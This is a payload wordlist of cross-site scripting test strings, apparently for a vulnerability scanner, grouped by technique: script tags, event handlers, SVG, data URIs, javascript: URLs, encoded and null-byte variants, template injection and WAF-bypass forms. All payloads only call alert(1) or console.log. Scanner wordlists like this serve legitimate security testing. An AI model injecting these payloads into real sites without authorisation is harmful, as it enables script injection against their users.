# XSS payloads for VulnScan Pro
# Basic script injection
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>console.log('xss')</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
</script><script>alert(1)</script>
# Event handlers
<img src=x onerror=alert(1)>
<img src=x onerror="alert(1)">
<body onload=alert(1)>
<svg onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onchange=alert(1)>
<textarea onfocus=alert(1) autofocus>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
# Attribute injection
" onmouseover="alert(1)
' onmouseover='alert(1)
" autofocus onfocus="alert(1)
' autofocus onfocus='alert(1)
# SVG vectors
<svg><script>alert(1)</script></svg>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<svg><set onbegin=alert(1) attributeName=x>
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
# Data URI
<iframe src="data:text/html,<script>alert(1)</script>">
<object data="data:text/html,<script>alert(1)</script>">
# JavaScript protocol
javascript:alert(1)
<a href="javascript:alert(1)">click</a>
# Case variation bypass
<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert(1)</SCRIPT>
<Script>alert(1)</Script>
# Encoded variants
%3Cscript%3Ealert(1)%3C%2Fscript%3E
%253Cscript%253Ealert(1)%253C%2Fscript%253E
&#60;script&#62;alert(1)&#60;/script&#62;
&lt;script&gt;alert(1)&lt;/script&gt;
# Null byte injection
<scr\x00ipt>alert(1)</scr\x00ipt>
<scr%00ipt>alert(1)</scr%00ipt>
# Template injection style
{{constructor.constructor('alert(1)')()}}
${alert(1)}
#{alert(1)}
# CSS injection
<style>body{background:url('javascript:alert(1)')}</style>
<link rel=stylesheet href="data:text/css,body{background:url('javascript:alert(1)')}">
# Meta redirect
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
# Form action
<form action="javascript:alert(1)"><button>submit</button></form>
# HTML5 vectors
<video><source onerror="alert(1)">
<picture><source onerror="alert(1)">
<keygen autofocus onfocus=alert(1)>
<isindex action=javascript:alert(1) type=submit value=XSS>
# WAF bypass combinations
<<script>alert(1)//<</script>
<script>al\u0065rt(1)</script>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<img/src=x/onerror=alert(1)>
